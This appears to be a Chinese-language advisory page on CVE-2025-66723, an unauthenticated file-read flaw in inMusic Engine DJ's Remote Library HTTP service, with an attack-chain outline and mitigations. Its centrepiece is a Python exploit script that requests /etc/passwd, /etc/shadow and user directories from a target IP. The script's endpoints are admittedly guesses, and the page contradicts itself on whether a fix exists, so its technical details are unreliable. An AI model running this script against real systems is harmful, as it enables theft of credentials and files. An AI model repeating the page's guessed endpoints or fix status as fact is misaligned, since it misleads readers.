CVE-2025-66723: inMusic Engine DJ 远程库HTTP服务不安全权限漏洞

漏洞信息

漏洞编号

CVE-2025-66723

漏洞类型

不安全的权限配置

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

inMusic Brands Engine DJ

漏洞概述

CVE-2025-66723是inMusic Brands公司开发的Engine DJ音乐管理软件中存在的一个高危安全漏洞。该漏洞影响Engine DJ 4.3.4之前的所有版本。漏洞的根本原因在于Remote Library功能中的HTTP服务存在不当的权限配置，导致该服务被暴露在网络中且无需任何认证即可访问。攻击者可以通过利用这个暴露的HTTP服务，无需任何身份验证即可访问目标系统上的所有文件以及网络路径资源。这一漏洞的CVSS评分达到7.5分，属于高危级别，其攻击复杂度低，无需特权账号或用户交互即可发起攻击。漏洞主要对系统的机密性造成严重影响，攻击者能够读取系统中的敏感文件、配置文件、用户数据以及其他可能包含敏感信息的资源。该漏洞的披露时间较早，但厂商在4.3.4版本中已经修复了此问题，建议所有使用Engine DJ的用户尽快更新到最新版本以防止潜在的安全风险。

技术细节

该漏洞的技术原理主要涉及Engine DJ软件中Remote Library功能的权限配置问题。Engine DJ是一款专业的DJ音乐管理软件，其Remote Library功能允许用户通过网络远程访问音乐库资源。该功能在实现时启动了一个HTTP服务来提供文件访问接口，但开发团队在配置这个HTTP服务时没有实施适当的访问控制机制。具体表现为：1) HTTP服务监听在所有网络接口上而非仅本地回环接口；2) 服务没有实现任何身份认证或授权检查机制；3) 服务允许访问文件系统的任意路径而没有进行路径遍历限制。攻击者可以直接通过HTTP请求访问该服务的端点，指定任意文件路径即可读取目标系统上的文件内容。由于该服务通常以较高权限运行（需要访问音乐文件和系统资源），攻击者甚至可以读取系统配置文件、用户凭证等敏感信息。此外，攻击者还可能利用此漏洞访问网络中的其他共享资源，进一步扩大攻击范围。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者扫描目标网络，发现运行Engine DJ软件的设备，并识别出Remote Library HTTP服务的暴露端口

STEP 2

步骤2: 服务探测

攻击者向暴露的HTTP服务发送请求，确认服务可访问且无需认证，探测可用的API端点和参数

STEP 3

步骤3: 文件路径构造

攻击者构造恶意文件路径请求，利用服务对路径验证不严的缺陷，尝试访问系统敏感文件

STEP 4

步骤4: 敏感数据窃取

攻击者成功读取目标系统上的敏感文件，包括配置文件、用户数据、系统信息等，造成机密性破坏

STEP 5

步骤5: 横向移动（可选）

如果获取的凭证或网络路径信息足够，攻击者可能利用这些资源进一步访问网络中的其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-66723 PoC - inMusic Engine DJ Insecure Permissions
# Target: Engine DJ with exposed Remote Library HTTP service
# Usage: python cve-2025-66723_poc.py <target_ip> <target_port>

import requests
import sys
import argparse

def exploit(target_ip, target_port=80):
    """
    Exploit for CVE-2025-66723 - Engine DJ Insecure Permissions
    This PoC demonstrates how an unauthenticated attacker can access
    arbitrary files on the target system through the exposed HTTP service.
    """
    base_url = f"http://{target_ip}:{target_port}"
    
    # Test connection and identify the service
    print(f"[*] Testing connection to {base_url}")
    try:
        response = requests.get(base_url, timeout=10)
        print(f"[+] Service detected: {response.headers.get('Server', 'Unknown')}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection failed: {e}")
        return False
    
    # List of sensitive files to attempt to read
    sensitive_paths = [
        "/etc/passwd",           # Unix/Linux password file
        "/etc/shadow",           # Unix/Linux shadow password file
        "C:\\Windows\\System32\\drivers\\etc\\hosts",  # Windows hosts file
        "/home/",                # Home directories
        "C:\\Users\\",          # Windows user directories
    ]
    
    print("[*] Attempting to access sensitive files...")
    for path in sensitive_paths:
        try:
            # Try different endpoint patterns
            endpoints = [
                f"{base_url}/file?path={path}",
                f"{base_url}/read?file={path}",
                f"{base_url}/download?path={path}",
                f"{base_url}/files{path}",
            ]
            
            for endpoint in endpoints:
                response = requests.get(endpoint, timeout=10)
                if response.status_code == 200 and len(response.content) > 0:
                    print(f"[+] SUCCESS: Accessed {path}")
                    print(f"[+] Content preview: {response.text[:200]}...")
                    return True
        except Exception as e:
            continue
    
    print("[-] Could not access files with common patterns")
    print("[*] Manual testing may be required")
    return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-66723 PoC')
    parser.add_argument('target_ip', help='Target IP address')
    parser.add_argument('target_port', type=int, default=80, help='Target port (default: 80)')
    args = parser.parse_args()
    
    print("=" * 60)
    print("CVE-2025-66723 - inMusic Engine DJ Insecure Permissions")
    print("=" * 60)
    exploit(args.target_ip, args.target_port)

影响范围

inMusic Brands Engine DJ < 4.3.4

防御指南

临时缓解措施

在厂商发布修复版本之前，建议采取以下临时缓解措施：1) 通过防火墙规则阻止外部网络对Engine DJ Remote Library HTTP端口的访问；2) 在企业网络环境中实施网络分段，将运行Engine DJ的设备隔离在受保护的网段；3) 禁用不必要的Remote Library功能；4) 监控相关服务的访问日志，及时发现异常访问行为；5) 考虑使用VPN等安全通道访问Remote Library功能，而非直接暴露在公网。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66723
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66723
3 Details https://www.cvedetails.com/cve/CVE-2025-66723/
4 VulDB https://vuldb.com/cve/CVE-2025-66723
5 Link https://github.com/audiopump/cve-2025-66723
6 Link https://www.inmusicbrands.com/